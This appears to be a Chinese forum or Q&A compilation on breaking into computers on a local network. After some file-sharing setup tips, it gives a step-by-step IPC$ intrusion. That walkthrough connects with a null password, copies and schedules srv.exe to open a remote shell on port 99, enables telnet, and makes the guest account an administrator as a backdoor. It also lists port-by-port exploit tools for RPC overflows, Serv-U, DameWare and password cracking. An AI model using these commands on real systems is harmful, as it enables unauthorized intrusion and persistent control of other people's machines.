本文目录一览:
局域网简单入侵步骤
事先 声明,本人不是黑客,不懂高深的计算机知识。
三步骤:
一、到要入侵的电脑上(假设IP:192.168.0.100),右击我的电脑--远程--允许用户远程连接到此计算机打勾。如果不懂得超级管理员权限,就去新建个帐户。
二、在你自己的电脑上,打开cmd ,输入:mstsc,跳出远程桌面,输入192.168.0.100。进入之后,要求输入正确的用户名密码,你就把刚刚建的帐户输入,或者你本来就已经知道超级管理员的权限,也可以输入。
三、进去之后,你可以写上某某到此一游。或者直接点开始--关机。于是......
请采纳
如果在局域网中网上邻居可以访问,该如何入侵呢?
不知道你别的电脑是不是xp的,这个是xp的方法
我个人探索的最快办法是:前提是在另一台机器XP下面设置几个共享文件。
1.在win7下面右键单击任务栏右下角“网络 internet访问”,选择“打开网络和共享中心”。
2.到查看网络-网络-工作网络中,打开“工作网络”。
3.点击“查看网络上的计算机和设备”。
4.找到另一台 电脑,打开就可以看到共享的文件了。
以下的方法都是在网上找的,如果上面方法对你不可行的话,你可以试试下面的方法。
Win7 如何访问XP系统裏的网上邻居?
把XP系统以下设置即可共享文件
1.开始-运行-services.msc-
找到"server"服务,属性启动类型-"自动"-确定,然後在左边点"启动",确定.
2.打开网上邻居属性-本地连接属性-安装-协议-"nwlink ipx/spx/netblos compatible
transport protocl" 双击
裏面还有个"network monitor driver"也要安装.
3.开始菜单运行-secpol.msc -安全设置-本地策略-用户权利指派-
"拒绝从网络访问这台计算机"属性,删除裏面的"所有用户组".
4.然後点安全选项:
网络访问:不允许SAM 帐户的匿名枚举, 属性给"停用".
网络访问: 不允许 SAM 帐户和共享的匿名枚举,属性给"停用".
5.点击桌面我的电脑右键-管理-本地用户和组-用户,把右边的guest用户属性"帐户已停用前面的钩去掉".
6.打开我的电脑-工具选项-文件夹选项-查看-把使用简单文件共享前面的钩去掉,确定.
7.关闭防火墙 这跟guest用户没关系,你装的是网上down的ghost版的win7吧,
非原版的win7许多做优化的时候都把一些服务关了,於是引来了局域网之间网络的发现有问题,但是如果在单位裏用的时候需要局域网之间的联通,看看该怎麼来解决:
1、右键“我的电脑”-“管理”-"服务和应用程序"
2、在服务裏面找到Function Discovery Resource Publication、SSDP
Discovery、UPnP Device Host、TCP/IP NetBIOS
Helper,把这四个服务启动,并设置成自动
3、在到“控制面板”-“网络和
Internet”-“网络和共享中心”-“高级共享设置”,展开“家庭和工作”选项,开启“启用网络发现”,“启用文件和打印机共享”,“关闭密码保护共享”(後两项根据个人来定)
1.在xp裏从组策略裏修改安全选项:网络访问: 本地帐户的共享和安全模型,属性改为"经典 - 本地用户以自己的身份验证"
2.给xp当前用户设置密码
3.访问时会提示输入凭证,输入xp用户名和密码
不知道这个行不行。
再就是他共享你才能看,多了我就不知道了,建议你去黑客基地看看。
局域网内的计算机不能上网 401网页错误
类似的问题我也碰到过,这是局域网服务器的问题,与网络无关,服务器的问题解决之后就没什么问题了
局域网内网入侵
我查拉135端口端口说明:135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码;使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。
端口漏洞:相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒,该病毒就是利用RPC漏洞来攻击计算机的。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。该漏洞会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。
1:用139端口入侵
我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。
用到两个NET命令,下面就是这两个命令的使用方法
NET VIEW?
作 用:显示域列表、计算机列表或指定计算机的共享资源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
参数介绍:?
1键入不带参数的net view显示当前域的计算机列表。?
2\\computername 指定要查看其共享资源的计算机。?
3/domain[:domainname]指定要查看其可用计算机的域?
NET USE?
作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
参数介绍:?
键入不带参数的net use列出网络连接。?
devicename指定要连接到的资源名称或要断开的设备名称。?
\\computername\sharename服务器及共享资源的名称。?
password访问共享资源的密码。?
*提示键入密码。 /user指定进行连接的另外一个用户。?
domainname指定另一个域。?
username指定登录的用户名。?
/home将用户连接到其宿主目录?
/delete取消指定网络连接。?
/persistent控制永久网络连接的使用。?
C:\net use \\IP
C:\net view \\IP
我们已经看到对方共享了他的C,D,E三个盘
我们要做的是使用NBTSTAT命令载入NBT快取.
c:\nbtstat –R 载入NBT快取
c:\nbtstat –c 看有无载入NBT快取
现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。
2:4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3:80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
4:serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
5: 554端口
用real554.exe入侵。
6:6129端口
用DameWare6129.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连
接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名
,输入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的
c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
5. C:\net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备
开始下面的命令。
6. C:\telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的
是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打
算建立一个Telnet服务!这就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32ntlm
输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这
个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使
用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作
一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\net user guest /active:yes
将对方的Guest用户激活
11. C:\net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我
们可以用guest再次访问这台计算机)
各个端口的入侵.%20k=5lalaaid=B0100019074
不算太复杂的!
入侵局域网方法
扫描端口,要清楚他看了什么端口才能对症下药啊。
最简单的就是IPC,或者TELNET。